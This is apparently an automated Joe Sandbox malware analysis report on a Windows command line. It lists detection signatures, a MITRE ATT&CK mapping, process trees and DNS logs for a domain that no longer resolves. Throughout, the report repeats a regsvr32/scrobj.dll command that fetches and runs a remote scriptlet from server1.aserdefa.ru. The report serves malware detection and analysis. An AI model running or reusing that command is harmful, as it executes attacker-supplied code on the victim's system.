Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report

Overview

General Information

Analysis ID:1565425
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Sigma detected: Execute Scriptlet from internet Via Regsvr32
Creates a process in suspended mode (likely to inject code)
Registers a DLL
Sigma detected: Scripting/CommandLine Process Spawned Regsvr32
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Classification

  • System is w10x64
  • cmd.exe (PID: 6756 cmdline: cmd /C "regsvr32 /s /n /u /i:http://server1.aserdefa.ru/deploy.xml scrobj.dll" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • conhost.exe (PID: 4144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • regsvr32.exe (PID: 5332 cmdline: regsvr32 /s /n /u /i:http://server1.aserdefa.ru/deploy.xml scrobj.dll MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: regsvr32 /s /n /u /i:http://server1.aserdefa.ru/deploy.xml scrobj.dll, CommandLine: regsvr32 /s /n /u /i:http://server1.aserdefa.ru/deploy.xml scrobj.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: cmd /C "regsvr32 /s /n /u /i:http://server1.aserdefa.ru/deploy.xml scrobj.dll", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6756, ParentProcessName: cmd.exe, ProcessCommandLine: regsvr32 /s /n /u /i:http://server1.aserdefa.ru/deploy.xml scrobj.dll, ProcessId: 5332, ProcessName: regsvr32.exe

Persistence and Installation Behavior

barindex
Source: Process startedAuthor: Joe Security: Data: Command: cmd /C "regsvr32 /s /n /u /i:http://server1.aserdefa.ru/deploy.xml scrobj.dll", CommandLine: cmd /C "regsvr32 /s /n /u /i:http://server1.aserdefa.ru/deploy.xml scrobj.dll", CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5500, ProcessCommandLine: cmd /C "regsvr32 /s /n /u /i:http://server1.aserdefa.ru/deploy.xml scrobj.dll", ProcessId: 6756, ProcessName: cmd.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://server1.aserdefa.ru/deploy.xmlAvira URL Cloud: Label: malware
Source: unknownDNS traffic detected: query: server1.aserdefa.ru replaycode: Name error (3)
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: server1.aserdefa.ru
Source: regsvr32.exe, 00000002.00000002.1666837180.000000000051F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://server1.aserdefa.ru/
Source: regsvr32.exe, 00000002.00000002.1666837180.00000000004C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://server1.aserdefa.ru/deploy.xml
Source: regsvr32.exe, 00000002.00000002.1666837180.000000000051F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://server1.aserdefa.ru/deploy.xml4
Source: regsvr32.exe, 00000002.00000002.1666802080.0000000000490000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://server1.aserdefa.ru/deploy.xmlscrobj.dll5
Source: regsvr32.exe, 00000002.00000002.1666837180.000000000051F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://server1.aserdefa.ru/deploy.xmly
Source: regsvr32.exe, 00000002.00000002.1666837180.000000000051F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: classification engineClassification label: mal56.evad.win@4/0@1/0
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4144:120:WilError_03
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /C "regsvr32 /s /n /u /i:http://server1.aserdefa.ru/deploy.xml scrobj.dll"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 /s /n /u /i:http://server1.aserdefa.ru/deploy.xml scrobj.dll
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 /s /n /u /i:http://server1.aserdefa.ru/deploy.xml scrobj.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 /s /n /u /i:http://server1.aserdefa.ru/deploy.xml scrobj.dll
Source: regsvr32.exe, 00000002.00000002.1666837180.0000000000506000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 /s /n /u /i:http://server1.aserdefa.ru/deploy.xml scrobj.dllJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
11
Process Injection
11
Regsvr32
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System1
Non-Application Layer Protocol
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
11
Process Injection
LSASS Memory1
System Information Discovery
Remote Desktop ProtocolData from Removable Media1
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1565425 Cookbook: defaultwindowscmdlinecookbook.jbs Startdate: 29/11/2024 Architecture: WINDOWS Score: 56 13 server1.aserdefa.ru 2->13 15 Antivirus detection for URL or domain 2->15 17 Sigma detected: Execute Scriptlet from internet Via Regsvr32 2->17 7 cmd.exe 1 2->7         started        signatures3 process4 process5 9 regsvr32.exe 12 7->9         started        11 conhost.exe 7->11         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://server1.aserdefa.ru/deploy.xmly0%Avira URL Cloudsafe
http://server1.aserdefa.ru/deploy.xmlscrobj.dll50%Avira URL Cloudsafe
http://server1.aserdefa.ru/0%Avira URL Cloudsafe
http://server1.aserdefa.ru/deploy.xml40%Avira URL Cloudsafe
http://server1.aserdefa.ru/deploy.xml100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
server1.aserdefa.ru
unknown
unknowntrue
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://server1.aserdefa.ru/deploy.xmlyregsvr32.exe, 00000002.00000002.1666837180.000000000051F000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://server1.aserdefa.ru/deploy.xmlscrobj.dll5regsvr32.exe, 00000002.00000002.1666802080.0000000000490000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://server1.aserdefa.ru/regsvr32.exe, 00000002.00000002.1666837180.000000000051F000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: safe
    unknown
    http://server1.aserdefa.ru/deploy.xml4regsvr32.exe, 00000002.00000002.1666837180.000000000051F000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://server1.aserdefa.ru/deploy.xmlregsvr32.exe, 00000002.00000002.1666837180.00000000004C0000.00000004.00000020.00020000.00000000.sdmptrue
    • Avira URL Cloud: malware
    unknown
    No contacted IP infos
    Joe Sandbox version:41.0.0 Charoite
    Analysis ID:1565425
    Start date and time:2024-11-29 19:53:39 +01:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 1m 29s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:defaultwindowscmdlinecookbook.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Number of analysed new started processes analysed:3
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal56.evad.win@4/0@1/0
    EGA Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Stop behavior analysis, all processes terminated
    • Not all processes where analyzed, report is missing behavior information
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtProtectVirtualMemory calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    No simulations
    No context
    No context
    No context
    No context
    No context
    No created / dropped files found
    No static file info
    TimestampSource PortDest PortSource IPDest IP
    Nov 29, 2024 19:54:30.526458025 CET5494553192.168.2.41.1.1.1
    Nov 29, 2024 19:54:30.671034098 CET53549451.1.1.1192.168.2.4
    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
    Nov 29, 2024 19:54:30.526458025 CET192.168.2.41.1.1.10x2b3Standard query (0)server1.aserdefa.ruA (IP address)IN (0x0001)false
    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
    Nov 29, 2024 19:54:30.671034098 CET1.1.1.1192.168.2.40x2b3Name error (3)server1.aserdefa.runonenoneA (IP address)IN (0x0001)false

    Click to jump to process

    Click to jump to process

    Click to dive into process behavior distribution

    Click to jump to process

    Target ID:0
    Start time:13:54:28
    Start date:29/11/2024
    Path:C:\Windows\SysWOW64\cmd.exe
    Wow64 process (32bit):true
    Commandline:cmd /C "regsvr32 /s /n /u /i:http://server1.aserdefa.ru/deploy.xml scrobj.dll"
    Imagebase:0x240000
    File size:236'544 bytes
    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:1
    Start time:13:54:28
    Start date:29/11/2024
    Path:C:\Windows\System32\conhost.exe
    Wow64 process (32bit):false
    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Imagebase:0x7ff7699e0000
    File size:862'208 bytes
    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:2
    Start time:13:54:29
    Start date:29/11/2024
    Path:C:\Windows\SysWOW64\regsvr32.exe
    Wow64 process (32bit):true
    Commandline:regsvr32 /s /n /u /i:http://server1.aserdefa.ru/deploy.xml scrobj.dll
    Imagebase:0x8a0000
    File size:20'992 bytes
    MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    No disassembly